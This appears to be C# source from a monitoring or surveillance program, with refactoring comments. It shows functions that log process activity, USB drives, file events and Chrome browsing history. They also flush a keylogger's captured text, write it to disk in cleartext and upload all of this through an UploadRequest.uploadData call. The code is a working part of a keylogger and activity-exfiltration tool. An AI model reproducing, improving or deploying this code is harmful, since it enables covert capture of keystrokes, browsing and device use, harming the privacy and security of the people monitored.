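/// <summary>
/// Appends an "application closed" record for <paramref name="szName"/> to the file at
/// <c>filePath</c> and forwards the same information to <c>UploadRequest.uploadData</c>.
/// </summary>
/// <param name="szName">Name of the process that exited.</param>
/// <param name="tsTime">How long the process ran; written with <c>TimeSpan.ToString()</c>.</param>
/// <remarks>
/// The record is produced when <c>bHasApp</c> is false, or when <c>bHasApp</c> is true and
/// <c>aszProcessFilter</c> contains <paramref name="szName"/>. Otherwise the call does nothing.
/// </remarks>
public static void saveApplicationExitTime(string szName, TimeSpan tsTime)
{
    if ((aszProcessFilter.Contains(szName) && bHasApp) || !bHasApp)
    {
        setFilePermission(filePath);

        // The using block releases the file handle even when WriteLine or the upload
        // throws. Previously an exception skipped Close() and left the handle open
        // until finalization.
        using (TextWriter tw = new StreamWriter(filePath, true))
        {
            string szRuntime = tsTime.ToString();
            tw.WriteLine("Application " + szName + " closed. Runtime:" + szRuntime);
            UploadRequest.uploadData(szName + " closed. Runtime:" + szRuntime, "Process Close", "reports_processes");
        }
    }
}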
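/// <summary>
/// Writes the current drive list to the file at <c>filePathUSB</c> when the drive set has
/// changed, and refreshes <c>UsbHandler.newDrives</c> on every call.
/// </summary>
/// <remarks>
/// "Changed" means: either snapshot is missing, the two snapshots differ in length, or any
/// position holds a different drive name. <c>UsbHandler.allDrives</c> is refreshed only when
/// a report is written; <c>UsbHandler.newDrives</c> is refreshed at the end of every call.
/// Drives are passed to <c>UploadRequest.uploadData</c> only while <c>bSkipStartUpUSB</c> is
/// true; the flag is set to true after the first written report.
/// </remarks>
public static void saveUSB()
{
    var previousDrives = UsbHandler.newDrives;
    var reportedDrives = UsbHandler.allDrives;

    bool bChanged = previousDrives == null
        || reportedDrives == null
        || previousDrives.Length != reportedDrives.Length;

    if (!bChanged)
    {
        // Any differing name counts as a change. The earlier loop overwrote its flag
        // on every iteration, so only the last pair of drives decided the outcome.
        for (int i = 0; i < previousDrives.Length; i++)
        {
            if (previousDrives[i].Name != reportedDrives[i].Name)
            {
                bChanged = true;
                break;
            }
        }
    }

    if (bChanged)
    {
        setFilePermission(filePathUSB);

        // The using block closes the file even if enumeration or the upload throws.
        using (TextWriter tw = new StreamWriter(filePathUSB, true))
        {
            Functions.Functions.writeCurrentDate(tw, 1);
            UsbHandler.allDrives = DriveInfo.GetDrives();

            foreach (DriveInfo d in UsbHandler.allDrives)
            {
                tw.WriteLine("Drive {0}", d.Name);
                tw.WriteLine();
                tw.WriteLine(" Drive type: {0}", d.DriveType);
                tw.WriteLine();

                if (bSkipStartUpUSB == true)
                {
                    UploadRequest.uploadData("Drive " + d.Name + " Drive type:" + d.DriveType, "USB", "reports_usb");
                }
            }

            bSkipStartUpUSB = true;
        }
    }

    UsbHandler.newDrives = DriveInfo.GetDrives();
}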
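/// <summary>
/// Appends a dated process report to the file at <c>filePath</c>: every entry of
/// <c>ProcessData.apdProcData</c> whose id is not yet in <c>ProcessData.apdShownProcesses</c>
/// is written out, and matching entries are passed to <c>UploadRequest.uploadData</c>.
/// </summary>
/// <remarks>
/// Uploads happen only while <c>bSkipStartUpProcess</c> is true, and only for processes that
/// pass the name filter (<c>bHasApp</c> false, or the name is in <c>aszProcessFilter</c>).
/// The flag is set to true at the end of every call.
/// </remarks>
public static void FileData()
{
    setFilePermission(filePath);

    // The using block closes the file even when a ProcessData accessor or the upload
    // throws. Previously that path skipped Close() and leaked the handle.
    using (TextWriter tw = new StreamWriter(filePath, true))
    {
        Functions.Functions.writeCurrentDate(tw, 1);

        // Assume nothing changed until a process that has not been shown yet is found.
        bHasChanged = false;

        foreach (ProcessData pd in ProcessData.apdProcData)
        {
            // A process not yet listed as shown is written out. For processes already
            // shown, a single "Output Omitted" marker is written, then nothing more
            // until the next new process resets bOutputOmitted.
            if (!ProcessData.apdShownProcesses.Contains(pd.getId()))
            {
                tw.WriteLine(pd.getProcessInfo());
                pd.setShownState(true); // presumably records the id as shown; verify in ProcessData
                bOutputOmitted = false;

                // A change has occurred.
                bHasChanged = true;

                if (bSkipStartUpProcess == true && ((aszProcessFilter.Contains(pd.getName()) && bHasApp) || !bHasApp))
                {
                    UploadRequest.uploadData(pd.getName(), "Process Open", "reports_processes");
                }
            }
            else if (bOutputOmitted == false)
            {
                tw.WriteLine("Output Omitted - no change detected...");
                bOutputOmitted = true;
            }
        }

        // Even if no change occurred, a marker line is written.
        if (bHasChanged == false)
        {
            tw.WriteLine("Output Omitted - no change detected...");
        }

        bSkipStartUpProcess = true;
    }
}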
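/// <summary>
/// Flushes the text buffered in <c>KeyLogger.szText</c>: appends it, with a date header, to
/// the file at <c>filePathLogger</c>, passes it to <c>UploadRequest.uploadData</c>, and then
/// clears the buffer. Does nothing when the buffer is empty.
/// </summary>
/// <remarks>
/// NOTE(review): the buffer content is written to disk and handed to the uploader unmodified,
/// so the file holds captured input in cleartext. Who can read it depends on
/// <c>setFilePermission</c>, which is not visible in this block.
/// </remarks>
public static void saveLogger()
{
    if (KeyLogger.szText == "")
    {
        return;
    }

    setFilePermission(filePathLogger);

    // The using block releases the file handle even when the write or the upload
    // throws. Previously that path skipped Close() and left the handle open.
    using (TextWriter tw = new StreamWriter(filePathLogger, true))
    {
        Functions.Functions.writeCurrentDate(tw, 1);
        tw.WriteLine(KeyLogger.szText);
        UploadRequest.uploadData(KeyLogger.szText, "Key Logger", "reports_keylogger");
        KeyLogger.szText = String.Empty;
    }
}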
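/// <summary>
/// Records a file-system event message in the file at <c>filePathFileManager</c> and passes
/// it to <c>UploadRequest.uploadData</c>, either as a warning or as a regular event.
/// </summary>
/// <param name="message">Event text; its content decides how the event is classified.</param>
/// <param name="action">Action label passed to the uploader (suffixed with " - Warning" for warnings).</param>
/// <remarks>
/// A message containing "FileManager", "Logger", "ChromeHistory", "USB" or "ProcessList" is a
/// warning (category "reports_warnings"). Any other message is a regular event (category
/// "reports_filemanager") unless it contains one of the excluded substrings. A message equal
/// to the last one recorded in its class is skipped.
/// NOTE(review): unlike the other save* methods visible here, no <c>setFilePermission</c> call
/// precedes the open; confirm whether that is intended.
/// </remarks>
private static void saveEvents(string message, string action)
{
    TextWriter tw;
    try
    {
        tw = new StreamWriter(filePathFileManager, true);
    }
    catch (Exception)
    {
        // Deliberate best effort: if the log cannot be opened the event is dropped.
        // Returning here replaces the null checks that used to guard each branch.
        return;
    }

    using (tw)
    {
        // In the earlier condition "&&" bound tighter than "||", so the null check and
        // the duplicate check applied only to "ProcessList". The other four keywords
        // bypassed both, and dereferenced a null writer when the open had failed.
        bool bIsWarning = message.Contains("FileManager")
            || message.Contains("Logger")
            || message.Contains("ChromeHistory")
            || message.Contains("USB")
            || message.Contains("ProcessList");

        if (bIsWarning)
        {
            // A repeated warning is dropped here and never falls through to the
            // regular-event branch.
            if (message != szLastWarningMessage)
            {
                Functions.Functions.writeCurrentDate(tw, 2);
                tw.WriteLine(message);
                UploadRequest.uploadData(message, action + " - Warning", "reports_warnings");
                szLastWarningMessage = message;
            }
        }
        else
        {
            bool bExcluded = message.Contains("Windows")
                || message.Contains("Microsoft")
                || message.Contains("laravel")
                || message.Contains("Google")
                || message.Contains("Surveillance")
                || message.Contains("$Recycle.Bin")
                || message.Contains("Local")
                || message.Contains("AppData")
                || message.Contains("Roaming")
                || message.Contains("Cyclop");

            if (!bExcluded && message != szLastMessage)
            {
                Functions.Functions.writeCurrentDate(tw, 2);
                tw.WriteLine(message);
                UploadRequest.uploadData(message, action, "reports_filemanager");
                szLastMessage = message;
            }
        }
    }
}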
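/// <summary>
/// Appends every entry of <c>GoogleChrome.allHistoryItems</c> (visit count and URL), under a
/// date header, to the file at <c>filePathChrome</c>, and passes each entry to
/// <c>UploadRequest.uploadData</c> while <c>bSkipStartUpChrome</c> is true.
/// </summary>
/// <remarks>
/// The file receives the raw URL; the upload receives the URL after
/// <c>Functions.Functions.filterChrome</c>. The flag is set to true at the end of every call.
/// NOTE(review): raw URLs can carry query-string data, and they are stored in cleartext.
/// </remarks>
public static void saveHistory()
{
    setFilePermission(filePathChrome);

    // The using block closes the file even when an item accessor or the upload throws.
    // Previously that path skipped Close() and leaked the handle.
    using (TextWriter tw = new StreamWriter(filePathChrome, true))
    {
        Functions.Functions.writeCurrentDate(tw, 1);

        for (int i = 0; i < GoogleChrome.allHistoryItems.Count; i++)
        {
            var item = GoogleChrome.allHistoryItems[i];

            tw.Write(item.Count + " --- ");
            tw.WriteLine(item.URL);
            tw.WriteLine();

            if (bSkipStartUpChrome == true)
            {
                UploadRequest.uploadData("Count:" + item.Count + " --- " + Functions.Functions.filterChrome(item.URL), "Browser History", "reports_history");
            }
        }

        bSkipStartUpChrome = true;
    }
}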